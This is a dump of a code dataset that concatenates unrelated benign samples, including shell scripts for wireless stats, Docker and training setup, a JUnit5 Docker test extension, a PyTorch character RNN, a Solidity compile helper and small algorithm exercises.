text
stringlengths
1
1.05M
#!/bin/bash
# Collect stats for each active wireless interface and append them, timestamped,
# to /etc/saildrone/system.wireless.
#
# I'm adding the following commented command as a placeholder, in case systemd
# decides to assign goofy names to wifi interfaces. It's something to check.
#   ip -a link | grep -v link | awk '{print $2}'
# This will show a list of just the interface names as they would appear in
# /proc/net/wireless.

# FIX: iterate over the actual interface names (e.g. "wlan0"), not the literal
# string "wlan" — the original re-dumped stats for ALL wlan interfaces once per
# matching line, duplicating output when more than one interface was up.
for iface in $(awk '/wlan/{sub(/:$/, "", $1); print $1}' /proc/net/wireless)
do
    # Gather only this interface's fields (1-11) from /proc/net/wireless.
    wifistats=$(awk -v target="$iface:" \
        '$1 == target {print $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11}' \
        /proc/net/wireless)
    # FIX: added %H — the original "+%Y_%m_%d_%M_%S" skipped the hour, making
    # log timestamps ambiguous and non-monotonic.
    echo "$(date '+%Y_%m_%d_%H_%M_%S') $wifistats" >> /etc/saildrone/system.wireless
done
#!/bin/bash
# Docker entrypoint: inject credentials and per-service toggles into the
# New Relic AWS CloudWatch plugin config, then exec the container command.

# Single source of truth for the config path (original repeated it 11 times,
# with a stray double slash).
CONFIG=/usr/local/newrelic_aws_cloudwatch_plugin-latest/config/newrelic_plugin.yml

# Service toggles, overridable via -e EC2=false etc.; default everything on.
EC2_ENABLED=${EC2:-"true"}
EBS_ENABLED=${EBS:-"true"}
ELB_ENABLED=${ELB:-"true"}
RDS_ENABLED=${RDS:-"true"}
SQS_ENABLED=${SQS:-"true"}
SNS_ENABLED=${SNS:-"true"}
EC_ENABLED=${EC:-"true"}
ECR_ENABLED=${ECR:-"true"}

# Required secrets — refuse to start without them.
if [ -z "$NEWRELIC_KEY" ]; then
    echo "NEWRELIC_KEY not detected, did you forget to set it with -e NEWRELIC_KEY=yourkey?"
    exit 1
fi
if [ -z "$AWS_ACCESS_KEY" ]; then
    echo "AWS_ACCESS_KEY not detected, did you forget to set it with -e AWS_ACCESS_KEY=yourkey?"
    exit 1
fi
if [ -z "$AWS_SECRET_KEY" ]; then
    echo "AWS_SECRET_KEY not detected, did you forget to set AWS_SECRET_KEY=yoursecret?"
    exit 1
fi

echo "Replacing keys"
# '#' as the sed delimiter so '/' in keys is safe; keys containing '#' would
# still break this substitution.
sed -e "s#YOUR_LICENSE_KEY_HERE#$NEWRELIC_KEY#g" -i "$CONFIG" || exit 1
sed -e "s#YOUR_AWS_ACCESS_KEY_HERE#$AWS_ACCESS_KEY#g" -i "$CONFIG" || exit 1
sed -e "s#YOUR_AWS_SECRET_KEY_HERE#$AWS_SECRET_KEY#g" -i "$CONFIG" || exit 1

echo "Replacing settings"
# Replace each SERVICE_ENABLED placeholder with the matching toggle. Order kept
# from the original so EC2_ENABLED is consumed before the EC_ENABLED pattern runs.
for service in EC2 EBS ELB RDS SQS SNS EC ECR; do
    toggle_var="${service}_ENABLED"
    # ${!toggle_var} is bash indirect expansion: the value of e.g. $EC2_ENABLED.
    sed -e "s/${service}_ENABLED/${!toggle_var}/g" -i "$CONFIG" || exit 1
done

echo "Starting new relic aws plugin agent..."
exec "$@"
// JSS style factory for the Layout Footer component.
// Receives the Material-UI theme and returns the class definitions used by the footer.
export default (theme) => {
  return {
    footerContainer: {
      width: '100%',
      alignItems: 'center',
      flexDirection: 'row',
      justifyContent: 'center',
      display: 'flex',
      backgroundColor: 'white',
    },
    footer: {
      marginLeft: 'auto',
      marginRight: 'auto',
      alignSelf: 'center',
      display: 'flex',
      flexDirection: 'row',
      alignItems: 'flex-start',
      justifyContent: 'space-between',
      backgroundColor: 'white',
      paddingTop: 40,
      paddingBottom: 40,
      // Narrow the footer on medium screens and below.
      [theme.breakpoints.down('md')]: {
        width: '90%',
      },
    },
    aboutContainer: {
      display: 'flex',
      flexDirection: 'column',
      justifyContent: 'center',
    },
    aboutResponsiveContainer: {
      display: 'flex',
      flexDirection: 'column',
      maxWidth: '100%',
      justifyContent: 'center',
    },
    logo: {
      height: '40px',
      objectFit: 'contain',
      alignSelf: 'flex-start',
    },
    socialLogo: {
      height: 'fit-content',
      width: 'fit-content',
      alignItems: 'flex-start',
    },
    socialLogoContainer: {
      display: 'flex',
      flexDirection: 'row',
    },
    about: {
      marginTop: 16,
      marginBottom: 16,
    },
    // Spacing utility classes.
    ml26: {
      marginLeft: 26,
    },
    mb16: {
      marginBottom: 16,
    },
    linkContainer: {
      display: 'flex',
      flexDirection: 'row',
      justifyContent: 'space-between',
      alignItems: 'flex-start',
      alignSelf: 'center',
      width: '100%',
      marginBottom: 40,
      marginTop: 40,
    },
    testVersion: {
      color: theme.palette.common.base5,
    },
    link: {
      textDecoration: 'none',
    },
  }
}
def is_latin_square(arr):
    """Return True if `arr` is a Latin square.

    A Latin square is an n x n grid in which every row and every column
    contains the same n distinct symbols exactly once.

    The original implementation pooled ALL elements into two global sets and
    only compared set sizes, so non-Latin grids such as [[1, 2], [1, 2]]
    incorrectly passed, and empty input raised IndexError.
    """
    n = len(arr)
    if n == 0:
        return False
    # Must be square: every row has exactly n entries.
    if any(len(row) != n for row in arr):
        return False
    # The symbol alphabet is fixed by the first row; it must hold n distinct values.
    symbols = set(arr[0])
    if len(symbols) != n:
        return False
    # Every row must contain exactly that symbol set.
    for row in arr:
        if set(row) != symbols:
            return False
    # Every column must contain exactly that symbol set.
    for j in range(n):
        if {arr[i][j] for i in range(n)} != symbols:
            return False
    return True


arr = [[1,2,3], [2,3,1], [3,1,2]]
result = is_latin_square(arr)
print(result)
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np

# --- Training data preprocessing ---
# Teach a character-level RNN to map 'apple' -> 'pple!' (predict the next char).
input_str = 'apple'
label_str = 'pple!'
char_vocab = sorted(list(set(input_str+label_str)))
vocab_size = len(char_vocab)
print ('문자 집합의 크기 : {}'.format(vocab_size))

input_size = vocab_size  # input width equals the character-vocabulary size (one-hot)
hidden_size = 5
output_size = 5
learning_rate = 0.1

# Assign a unique integer index to every character.
char_to_index = dict((c, i) for i, c in enumerate(char_vocab))
print(char_to_index)

# Reverse mapping, used later to turn predicted indices back into characters.
index_to_char={}
for key, value in char_to_index.items():
    index_to_char[value] = key
print(index_to_char)

x_data = [char_to_index[c] for c in input_str]
y_data = [char_to_index[c] for c in label_str]
print(x_data)
print(y_data)

# Add a batch dimension (could equivalently be done with unsqueeze(0) on the tensor).
x_data = [x_data]
y_data = [y_data]
print(x_data)
print(y_data)

# One-hot encode the input indices.
x_one_hot = [np.eye(vocab_size)[x] for x in x_data]
print(x_one_hot)

# Training data ready — convert to tensors.
X = torch.FloatTensor(x_one_hot)
Y = torch.LongTensor(y_data)

# --- RNN model ---
class Net(torch.nn.Module):
    def __init__(self, input_size, hidden_size, output_size):
        super(Net, self).__init__()
        # RNN cell; batch_first=True so inputs are (batch, seq, feature).
        self.rnn = torch.nn.RNN(input_size, hidden_size, batch_first=True)
        # Output (projection) layer.
        self.fc = torch.nn.Linear(hidden_size, output_size, bias=True)

    def forward(self, x):
        # Run the RNN cell, then project its outputs through the linear layer.
        x, _status = self.rnn(x)
        x = self.fc(x)
        return x

net = Net(input_size, hidden_size, output_size)

criterion = torch.nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), learning_rate)

for i in range(100):
    optimizer.zero_grad()
    outputs = net(X)
    # view(-1, ...) flattens away the batch dimension for CrossEntropyLoss.
    loss = criterion(outputs.view(-1, input_size), Y.view(-1))
    loss.backward()      # compute gradients
    optimizer.step()     # update the parameters registered with the optimizer
    # The next three lines only inspect what the model actually predicted:
    # pick, per time-step, the index of the highest-scoring class,
    # then decode those indices back into a string.
    result = outputs.data.numpy().argmax(axis=2)
    result_str = ''.join([index_to_char[c] for c in np.squeeze(result)])
    print(i, "loss: ", loss.item(), "prediction: ", result, "true Y: ", y_data, "prediction str: ", result_str)
import java.util.Random;

public class RandomChar {

    // Shared generator: avoids constructing (and re-seeding) a new Random on every call.
    private static final Random RANDOM = new Random();

    /**
     * Returns a uniformly random uppercase letter in the range 'A'..'Z'.
     *
     * <p>Fixes a bug in the original: {@code random.nextInt() % 26} can be
     * negative (nextInt() returns any int, including negatives), which produced
     * characters below 'A'. {@code nextInt(26)} is always in [0, 25].
     *
     * @return a random character between 'A' and 'Z' inclusive
     */
    public static char getRandomChar() {
        int offset = RANDOM.nextInt(26); // 0..25
        return (char) ('A' + offset);    // 'A' is ASCII 65
    }
}
## arg 1: the new package version post_install() { update-desktop-database /usr/share/applications echo "Se actualizo la base de datos" }
import re


def extract_ids(code_snippet):
    """Extract the integer right-hand sides of simple assignments.

    Scans `code_snippet` for every occurrence of the form `name = number`
    (whitespace around '=' optional) and returns the numbers, in order of
    appearance, as a list of ints.
    """
    assignment_pattern = r'(\w+)\s*=\s*(\d+)'
    # findall yields (name, digits) tuples; only the numeric side is kept.
    return [int(digits) for _, digits in re.findall(assignment_pattern, code_snippet)]
#!/bin/bash sleep 10 foreman start
package image

import "fmt"

// StageID identifies a build stage by its content signature plus a unique ID.
type StageID struct {
	Signature string `json:"signature"`
	UniqueID  string `json:"uniqueID"`
}

// String implements fmt.Stringer, rendering both fields in a
// "signature:<sig> uniqueID:<id>" form suitable for logs.
func (id StageID) String() string {
	return fmt.Sprintf("signature:%s uniqueID:%s", id.Signature, id.UniqueID)
}

// StageDescription pairs a stage identifier with its image metadata.
// Info is declared elsewhere in this package — presumably per-image metadata; confirm there.
type StageDescription struct {
	StageID *StageID `json:"stageID"`
	Info    *Info    `json:"info"`
}
package no.mnemonic.commons.jupiter.docker;

import no.mnemonic.commons.utilities.ObjectUtils;
import no.mnemonic.commons.utilities.StringUtils;
import no.mnemonic.commons.utilities.collections.CollectionUtils;
import no.mnemonic.commons.utilities.collections.MapUtils;
import no.mnemonic.commons.utilities.collections.SetUtils;
import no.mnemonic.commons.utilities.lambda.LambdaUtils;
import org.junit.jupiter.api.extension.*;
import org.mandas.docker.client.DockerClient;
import org.mandas.docker.client.builder.resteasy.ResteasyDockerClientBuilder;
import org.mandas.docker.client.messages.ContainerConfig;
import org.mandas.docker.client.messages.ContainerInfo;
import org.mandas.docker.client.messages.HostConfig;
import org.mandas.docker.client.messages.PortBinding;

import java.util.*;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.function.Supplier;
import java.util.stream.Collectors;

import static no.mnemonic.commons.utilities.ObjectUtils.ifNull;
import static no.mnemonic.commons.utilities.collections.ListUtils.list;
import static no.mnemonic.commons.utilities.collections.MapUtils.Pair.T;
import static no.mnemonic.commons.utilities.collections.MapUtils.map;

/**
 * DockerExtension is a JUnit5 extension which starts up an isolated Docker container in a unit test, for example for
 * integration tests against an external database. DockerExtension will start up the container only once before all
 * tests and will make sure that the container is teared down after all tests (i.e. when the JVM shuts down).
 * <p>
 * In order to start up a container the following steps are performed:
 * <ol>
 * <li>Initialize a Docker client. If the $DOCKER_HOST environment variable is set it will connect to the Docker
 * installation specified by this variable. Otherwise it will try to connect to localhost on TCP port 2375 (default
 * Docker daemon port).</li>
 * <li>Initialize and start up a Docker container specified by the name of a Docker image. It is expected that the
 * Docker image is already installed (for example by performing 'docker pull').</li>
 * <li>Test that the container is reachable. See {@link #isContainerReachable()} for more information.</li>
 * <li>Prepare the container with additional data. See {@link #prepareContainer()} for more information.</li>
 * </ol>
 * <p>
 * After all tests are finished, either successfully, with an exception or by user cancellation, the running container
 * is stopped and removed in order to not leave stale containers behind.
 * <p>
 * Initialize DockerExtension in the following way using {@link RegisterExtension}:
 * <pre>
 * {@code @RegisterExtension
 * public static DockerExtension docker = DockerExtension.builder()
 *   .setImageName("busybox")
 *   .setReachabilityTimeout(30)
 *   .addApplicationPort(8080)
 *   .build();}
 * </pre>
 * See {@link DockerExtension.Builder} for more information on the configuration properties.
 * <p>
 * This class provides a basic Docker extension but it is most useful to extend it and override {@link #isContainerReachable()}
 * and {@link #prepareContainer()} for more specific use cases, for instance when testing a specific database.
 * See {@link CassandraDockerExtension} as an example.
 * <p>
 * <h3>Proxy settings</h3>
 * The DockerExtension will by default use system properties to determine proxy settings when communicating with the
 * docker daemon. To completely disable proxy, you can set the system property "-DDockerExtension.disable.proxy=true".
 */
public class DockerExtension implements BeforeAllCallback, BeforeEachCallback, AfterEachCallback, AfterAllCallback {

  private static final String DOCKER_HOST_ENVIRONMENT_VARIABLE = "DOCKER_HOST";
  private static final int DEFAULT_DOCKER_DAEMON_PORT = 2375;
  private static final int DEFAULT_STOP_TIMEOUT_SECONDS = 10;
  private static final int DEFAULT_REACHABILITY_TIMEOUT_SECONDS = 30;

  // Immutable configuration captured at construction time.
  private final String imageName;
  private final Set<String> applicationPorts;
  private final String exposedPortsRange;
  private final int reachabilityTimeout;
  private final boolean skipReachabilityCheck;
  private final Supplier<DockerClient> dockerClientResolver;
  private final Map<String, String> environmentVariables;

  // Mutable state: set in beforeAll(), cleared in afterAll().
  private DockerClient docker;
  private String containerID;

  /**
   * Constructor to override by subclasses.
   *
   * @param imageName             Name of Docker image (required)
   * @param applicationPorts      Application ports available inside the container (at least one is required)
   * @param exposedPortsRange     Range of ports for mapping to the outside of the container (optional)
   * @param reachabilityTimeout   Timeout until testing that container is reachable stops (optional)
   * @param skipReachabilityCheck If set skip testing that container is reachable (optional)
   * @param dockerClientResolver  Function to resolve DockerClient (optional)
   * @param environmentVariables  Container's environment variables (optional)
   * @throws IllegalArgumentException If one of the required parameters is not provided
   */
  protected DockerExtension(String imageName,
                            Set<Integer> applicationPorts,
                            String exposedPortsRange,
                            int reachabilityTimeout,
                            boolean skipReachabilityCheck,
                            Supplier<DockerClient> dockerClientResolver,
                            Map<String, String> environmentVariables) {
    if (StringUtils.isBlank(imageName)) throw new IllegalArgumentException("'imageName' not provided!");
    if (CollectionUtils.isEmpty(applicationPorts)) throw new IllegalArgumentException("'applicationPorts' not provided!");
    if (!skipReachabilityCheck && reachabilityTimeout <= 0)
      throw new IllegalArgumentException("'reachabilityTimeout' not provided!");
    this.imageName = imageName;
    // Ports are stored as strings because the docker API works with string port specs.
    this.applicationPorts = Collections.unmodifiableSet(applicationPorts.stream()
            .filter(Objects::nonNull)
            .map(String::valueOf)
            .collect(Collectors.toSet()));
    this.exposedPortsRange = exposedPortsRange;
    this.reachabilityTimeout = reachabilityTimeout;
    this.skipReachabilityCheck = skipReachabilityCheck;
    this.dockerClientResolver = ifNull(dockerClientResolver, (Supplier<DockerClient>) this::resolveDockerClient);
    this.environmentVariables = Collections.unmodifiableMap(environmentVariables);

    // Make sure to always shutdown any containers in order to not leave stale containers on the host machine,
    // e.g. in case of exceptions or when the user stops the tests. This won't work if the JVM process is killed.
    Runtime.getRuntime().addShutdownHook(new Thread(this::shutdownContainer));
  }

  /**
   * Returns the host where the started Docker container is available. It takes the $DOCKER_HOST environment variable
   * into account and falls back to 'localhost' if the variable is not specified.
   *
   * @return Host where the started Docker container is available
   */
  public String getExposedHost() {
    return DockerTestUtils.getDockerHost();
  }

  /**
   * DockerExtension will map the application ports, which are the ports applications listen to inside the container,
   * to random ports on the host machine, which can be used to communicate with the applications. For example,
   * the application port 8080 could be mapped to random port 33333 on the host machine.
   * <p>
   * This method returns the exposed host port for a given application port.
   *
   * @param applicationPort Application port inside container
   * @return Exposed port on host machine
   * @throws IllegalStateException If mapped host port cannot be determined
   */
  public int getExposedHostPort(int applicationPort) {
    int hostPort;

    try {
      // Fetch container information and find binding for application port which contains the exposed host port.
      ContainerInfo info = docker.inspectContainer(containerID);
      // Return first available TCP host port bound to application port.
      hostPort = map(info.networkSettings().ports())
              .getOrDefault(applicationPort + "/tcp", list())
              .stream()
              .map(PortBinding::hostPort)
              .map(Integer::parseInt)
              .findFirst()
              .orElse(0);
    } catch (Exception ex) {
      throw new IllegalStateException("Could not determine exposed host port.", ex);
    }

    if (hostPort <= 0) {
      throw new IllegalStateException("Could not determine exposed host port.");
    }

    return hostPort;
  }

  /**
   * Create builder for DockerExtension.
   *
   * @return Builder object
   */
  public static <T extends Builder<?>> Builder<T> builder() {
    return new Builder<>();
  }

  /**
   * Subclasses can override this method in order to apply additional configuration to the host inside the container.
   * <p>
   * If not overridden the default configuration will be used.
   *
   * @param config Default configuration as set up by DockerExtension
   * @return Modified host configuration
   */
  protected HostConfig additionalHostConfig(HostConfig config) {
    // By default, return host configuration unchanged.
    return config;
  }

  /**
   * Subclasses can override this method in order to apply additional configuration to the container itself.
   * <p>
   * If not overridden the default configuration will be used.
   *
   * @param config Default configuration as set up by DockerExtension
   * @return Modified container configuration
   */
  protected ContainerConfig additionalContainerConfig(ContainerConfig config) {
    // By default, return container configuration unchanged.
    return config;
  }

  /**
   * Subclasses can override this method in order to implement a check to determine if a container is reachable. After
   * start up of the container this method will be called until it either returns true or 'reachabilityTimeout' is
   * reached. If the container is not reachable until 'reachabilityTimeout' starting up DockerExtension will fail with
   * a TimeoutException.
   * <p>
   * If not overridden the method immediately returns true.
   *
   * @return True if container is reachable
   */
  protected boolean isContainerReachable() {
    // By default, just return true.
    return true;
  }

  /**
   * Subclasses can override this method in order to prepare a container once before tests are executed, for example by
   * initializing a database with a schema or inserting some application data into a database. This method is called
   * once after it was determined that the container is reachable by {@link #isContainerReachable()}.
   * <p>
   * If not overridden the method does nothing.
   */
  protected void prepareContainer() {
    // By default, do nothing.
  }

  /**
   * Expose DockerClient used by DockerExtension to subclasses. Use this client when overriding {@link #isContainerReachable()}
   * or {@link #prepareContainer()}.
   *
   * @return DockerClient used by DockerExtension
   */
  public DockerClient getDockerClient() {
    return docker;
  }

  /**
   * Expose containerID of the started container to subclasses. Use this containerID when overriding {@link #isContainerReachable()}
   * and {@link #prepareContainer()} in order to communicate with the started container directly.
   *
   * @return containerID of started container
   */
  public String getContainerID() {
    return containerID;
  }

  /**
   * Initialize DockerExtension before executing tests. It should not be necessary to override this method.
   *
   * @throws Exception If initialization fails
   */
  @Override
  public void beforeAll(ExtensionContext context) throws Exception {
    // Class-level lock: guards the shared 'docker' field against concurrent test engines.
    synchronized (DockerExtension.class) {
      // Only initialize everything once. It will be automatically teared down when the JVM shuts down.
      if (docker == null) {
        initializeDockerClient();
        initializeContainer();
        testContainerReachability();
        prepareContainer();
      }
    }
  }

  /**
   * Subclasses can override this method in order to implement specific @BeforeEach behaviour.
   */
  @Override
  public void beforeEach(ExtensionContext context) {
    // By default, do nothing. DockerExtension must implement this method such
    // that SingletonDockerExtensionWrapper can handle @BeforeEach properly.
  }

  /**
   * Subclasses can override this method in order to implement specific @AfterEach behaviour.
   */
  @Override
  public void afterEach(ExtensionContext context) {
    // By default, do nothing. DockerExtension must implement this method such
    // that SingletonDockerExtensionWrapper can handle @AfterEach properly.
  }

  /**
   * Teardown DockerExtension after executing tests. It should not be necessary to override this method.
   */
  @Override
  public void afterAll(ExtensionContext context) {
    synchronized (DockerExtension.class) {
      if (docker != null) {
        shutdownContainer();
        docker = null;
      }
    }
  }

  private DockerClient resolveDockerClient() {
    try {
      if (!StringUtils.isBlank(System.getenv(DOCKER_HOST_ENVIRONMENT_VARIABLE))) {
        // If DOCKER_HOST is set create docker client from environment variables.
        return new ResteasyDockerClientBuilder()
                .fromEnv()
                .useProxy(useProxySettings())
                .build();
      } else {
        // Otherwise connect to localhost on the default daemon port.
        return new ResteasyDockerClientBuilder()
                .uri(String.format("http://localhost:%d", DEFAULT_DOCKER_DAEMON_PORT))
                .useProxy(useProxySettings())
                .build();
      }
    } catch (Exception ex) {
      throw new IllegalStateException("Could not create docker client.", ex);
    }
  }

  private boolean useProxySettings() {
    // Allow user to turn off proxy autodetection by setting this property using a system property.
    return !Boolean.parseBoolean(ifNull(System.getProperty("DockerExtension.disable.proxy"), "false"));
  }

  private void initializeDockerClient() {
    this.docker = dockerClientResolver.get();

    try {
      // Check that docker daemon is reachable.
      if (!"OK".equals(docker.ping())) {
        throw new IllegalStateException("ping() did not return OK.");
      }
    } catch (Exception ex) {
      throw new IllegalStateException("Could not connect to docker daemon.", ex);
    }
  }

  private void initializeContainer() {
    // Either bind to a port from the configured range or let docker pick a random free port.
    PortBinding portBinding = StringUtils.isBlank(exposedPortsRange) ?
            PortBinding.randomPort("0.0.0.0") : PortBinding.of("0.0.0.0", exposedPortsRange);

    // Bind ports on the host to the application ports of the container randomly or with configured range.
    // Also apply any additional host configuration by calling additionalHostConfig().
    HostConfig hostConfig = additionalHostConfig(HostConfig.builder()
            .portBindings(map(applicationPorts, port -> T(port, list(portBinding))))
            .build());

    // Convert provided environmental variables to appropriate docker format.
    List<String> env = environmentVariables.entrySet()
            .stream()
            .map(e -> String.format("%s=%s", e.getKey(), e.getValue()))
            .collect(Collectors.toList());

    // Configure container with the image to start and host port -> application port bindings.
    // Also apply any additional container configuration by calling additionalContainerConfig().
    ContainerConfig containerConfig = additionalContainerConfig(ContainerConfig.builder()
            .image(imageName)
            .exposedPorts(applicationPorts)
            .hostConfig(hostConfig)
            .env(env)
            .build());

    try {
      containerID = docker.createContainer(containerConfig).id();
      docker.startContainer(containerID);
    } catch (Exception ex) {
      throw new IllegalStateException(String.format("Could not start container (image '%s').", imageName), ex);
    }
  }

  private void shutdownContainer() {
    // Ignore exceptions because the container goes down anyways.
    LambdaUtils.tryTo(() -> {
      if (docker == null || StringUtils.isBlank(containerID)) return;
      docker.stopContainer(containerID, DEFAULT_STOP_TIMEOUT_SECONDS);
      docker.removeContainer(containerID);
    });
    // But always release client connection.
    ObjectUtils.ifNotNullDo(docker, DockerClient::close);
  }

  private void testContainerReachability() throws Exception {
    if (skipReachabilityCheck) return;
    // Poll isContainerReachable() until it returns true or the timeout expires.
    if (!LambdaUtils.waitFor(this::isContainerReachable, reachabilityTimeout, TimeUnit.SECONDS)) {
      throw new TimeoutException("Could not connect to container before timeout.");
    }
  }

  /**
   * Builder to create a DockerExtension.
   * <p>
   * Subclasses of DockerExtension can also define own builders extending this builder in order to be able to configure
   * the same properties. The configurable properties are exposed as protected fields which can be passed to the
   * constructor of a subclass. This constructor in turn should pass them to the constructor of DockerExtension.
   * See {@link CassandraDockerExtension.Builder} as an example.
   */
  public static class Builder<T extends Builder<?>> {
    protected String imageName;
    protected Set<Integer> applicationPorts;
    protected String exposedPortsRange;
    protected int reachabilityTimeout = DEFAULT_REACHABILITY_TIMEOUT_SECONDS;
    protected boolean skipReachabilityCheck;
    protected Supplier<DockerClient> dockerClientResolver;
    protected Map<String, String> environmentVariables = new HashMap<>();

    /**
     * Build a configured DockerExtension.
     *
     * @return Configured DockerExtension
     */
    public DockerExtension build() {
      return new DockerExtension(imageName, applicationPorts, exposedPortsRange, reachabilityTimeout,
              skipReachabilityCheck, dockerClientResolver, environmentVariables);
    }

    /**
     * Set image name of container to use. The image must be available in Docker, it is not automatically pulled!
     *
     * @param imageName Image name
     * @return Builder
     */
    public T setImageName(String imageName) {
      this.imageName = imageName;
      return (T) this;
    }

    /**
     * Set application ports which will be used inside the container and exposed outside of the container by mapping to
     * ports inside the range specified with {@link #setExposedPortsRange(String)} or random ports.
     * <p>
     * Also see {@link #getExposedHostPort(int)} for more information.
     *
     * @param applicationPorts Set of application ports
     * @return Builder
     */
    public T setApplicationPorts(Set<Integer> applicationPorts) {
      this.applicationPorts = applicationPorts;
      return (T) this;
    }

    /**
     * Add a single application port which will be used inside the container and exposed outside of the container by
     * mapping to a port inside the range specified with {@link #setExposedPortsRange(String)} or a random port.
     * <p>
     * Also see {@link #getExposedHostPort(int)} for more information.
     *
     * @param applicationPort Single application port
     * @return Builder
     */
    public T addApplicationPort(int applicationPort) {
      this.applicationPorts = SetUtils.addToSet(this.applicationPorts, applicationPort);
      return (T) this;
    }

    /**
     * Set port range which will be used for exposing ports inside the container to the outside of the container.
     *
     * @param exposedPortsRange String in format "firstPort-lastPort" which is used for setting a range of ports
     * @return Builder
     */
    public T setExposedPortsRange(String exposedPortsRange) {
      this.exposedPortsRange = exposedPortsRange;
      return (T) this;
    }

    /**
     * Set timeout in seconds until test for container reachability stops. Defaults to 30 seconds if not set.
     * <p>
     * Also see {@link #isContainerReachable()} for more information.
     *
     * @param reachabilityTimeout Timeout in seconds
     * @return Builder
     */
    public T setReachabilityTimeout(int reachabilityTimeout) {
      this.reachabilityTimeout = reachabilityTimeout;
      return (T) this;
    }

    /**
     * Configure DockerExtension to skip test for container reachability. Useful if application code implements similar functionality.
     *
     * @return Builder
     */
    public T skipReachabilityCheck() {
      this.skipReachabilityCheck = true;
      return (T) this;
    }

    /**
     * Override the default behaviour of how a DockerClient will be created by providing a custom resolver function.
     * Should be used with care, but useful for providing a mock during unit testing, for instance.
     *
     * @param dockerClientResolver Customer DockerClient resolver function
     * @return Builder
     */
    public T setDockerClientResolver(Supplier<DockerClient> dockerClientResolver) {
      this.dockerClientResolver = dockerClientResolver;
      return (T) this;
    }

    /**
     * Set multiple environment variables for the container.
     *
     * @param variables Array of key-value pairs
     * @return Builder
     */
    public T setEnvironmentVariables(MapUtils.Pair<String, String>... variables) {
      this.environmentVariables = MapUtils.map(variables);
      return (T) this;
    }

    /**
     * Add an additional environment variable for the container.
     *
     * @param key   Variable name
     * @param value Variable value
     * @return Builder
     */
    public T addEnvironmentVariable(String key, String value) {
      this.environmentVariables = MapUtils.addToMap(this.environmentVariables, key, value);
      return (T) this;
    }
  }
}
#!/bin/bash
# Launch a TALI training run: sync the repo, install deps, set up the
# experiment disk and wandb credentials, free the GPUs, then start training.

export HOME=/root/
source "$HOME/.bashrc"
source "$HOME/conda/bin/activate"
conda activate tali

# FIX: abort early if CODE_DIR is unset — previously an unset CODE_DIR made
# 'cd' silently stay in the current directory and source the wrong files.
: "${CODE_DIR:?CODE_DIR must be set}"

cd "$CODE_DIR" || exit 1
git pull
pip install -r "$CODE_DIR/requirements.txt"
source "$CODE_DIR/setup_scripts/setup_base_experiment_disk.sh"
source "$CODE_DIR/setup_scripts/setup_wandb_credentials.sh"
cd "$CODE_DIR" || exit 1

# Kill any leftover processes holding the GPUs (best effort: fuser returns
# non-zero when nothing is using the devices).
fuser -k /dev/nvidia*

python "$CODE_DIR/run.py" \
    hydra.verbose=True \
    trainer=default \
    resume=True \
    batch_size=4 \
    trainer.gpus=2 \
    trainer.auto_scale_batch_size=True \
    datamodule.dataset_config.rescan_paths=True \
    datamodule.prefetch_factor=3 \
    datamodule.num_workers=24 \
    model=base_modus_prime_resnet50 \
    datamodule.dataset_config.dataset_size_identifier=base \
    datamodule.dataset_config.modality_config.image=True \
    datamodule.dataset_config.modality_config.text=True \
    datamodule.dataset_config.modality_config.audio=False \
    datamodule.dataset_config.modality_config.video=True
<filename>components/PopOver/style/less.js import '../../Transitions/style/less.js'; import '../../Helpers/style/less.js'; import './index.less'
#!/bin/bash set -e . $(dirname "$0")/common.sh if [ "$FEATURES_ENVIRONMENT" == "" ]; then echo "[ERROR]: No FEATURES_ENVIRONMENT provided" exit 1 fi if [ "$FEATURES" == "" ]; then echo "[ERROR]: No FEATURES provided" exit 1 fi # expect oc to be in PATH by default export OC_TOOL="${OC_TOOL:-oc}" # Deploy features success=0 iterations=0 sleep_time=10 max_iterations=72 # results in 12 minutes timeout until [[ $success -eq 1 ]] || [[ $iterations -eq $max_iterations ]] do feature_failed=0 for feature in $FEATURES; do feature_dir=feature-configs/${FEATURES_ENVIRONMENT}/${feature}/ if [[ ! -d $feature_dir ]]; then echo "[WARN] Feature '$feature' is not configured for environment '$FEATURES_ENVIRONMENT', skipping it" continue fi echo "[INFO] Deploying feature '$feature' for environment '$FEATURES_ENVIRONMENT'" set +e # be verbose on last iteration only if [[ $iterations -eq $((max_iterations - 1)) ]] || [[ -n "${VERBOSE}" ]]; then ${OC_TOOL} apply -k "$feature_dir" else ${OC_TOOL} apply -k "$feature_dir" &> /dev/null fi # shellcheck disable=SC2181 if [[ $? != 0 ]]; then echo "[WARN] Deployment of feature '$feature' failed." feature_failed=1 fi set -e done if [[ $feature_failed -eq 1 ]]; then iterations=$((iterations + 1)) iterations_left=$((max_iterations - iterations)) if [[ $iterations_left != 0 ]]; then echo "[WARN] Deployment did not fully succeed yet, retrying in $sleep_time sec, $iterations_left retries left" sleep $sleep_time else echo "[WARN] At least one deployment failed, giving up" fi else # All features deployed successfully success=1 fi done if [[ $success -eq 1 ]]; then echo "[INFO] Deployment successful" else echo "[ERROR] Deployment failed" exit 1 fi
'use strict'
import { canUseWorker, urlFromVersion } from './compiler-utils'
import { Compiler } from '@remix-project/remix-solidity'
import { CompilerAbstract } from './compiler-abstract'

/**
 * Compile the given targets with the configured Solidity compiler version.
 *
 * @param {Object} compilationTargets    sources to compile
 * @param {Object} settings              compiler settings: version, evmVersion, optimize, language, runs
 * @param {Function} contentResolverCallback callback the Compiler uses to resolve imported source content
 * @returns {Promise<CompilerAbstract>} resolves with the wrapped compilation result.
 *   NOTE(review): the promise only ever resolves — compiler errors are carried
 *   inside the compilation data, and a compiler that never loads leaves it pending.
 */
export const compile = async (compilationTargets, settings, contentResolverCallback) => {
  return new Promise((resolve) => {
    const compiler = new Compiler(contentResolverCallback)
    compiler.set('evmVersion', settings.evmVersion)
    compiler.set('optimize', settings.optimize)
    compiler.set('language', settings.language)
    compiler.set('runs', settings.runs)
    compiler.loadVersion(canUseWorker(settings.version), urlFromVersion(settings.version))
    // Register handlers before the load completes: compile once loaded, resolve once finished.
    compiler.event.register('compilationFinished', (success, compilationData, source) => {
      resolve(new CompilerAbstract(settings.version, compilationData, source))
    })
    compiler.event.register('compilerLoaded', () => compiler.compile(compilationTargets, ''))
  })
}
# SPOJ "Small Factorial": read T test cases, print K! for each.
T = int(input())


def func(N):
    # Recursive factorial; equivalent to the original
    # `lambda N: N and func(N - 1) * N or 1` (0! == 1 base case).
    return func(N - 1) * N if N else 1


for _ in range(T):
    K = int(input())
    print(func(K))
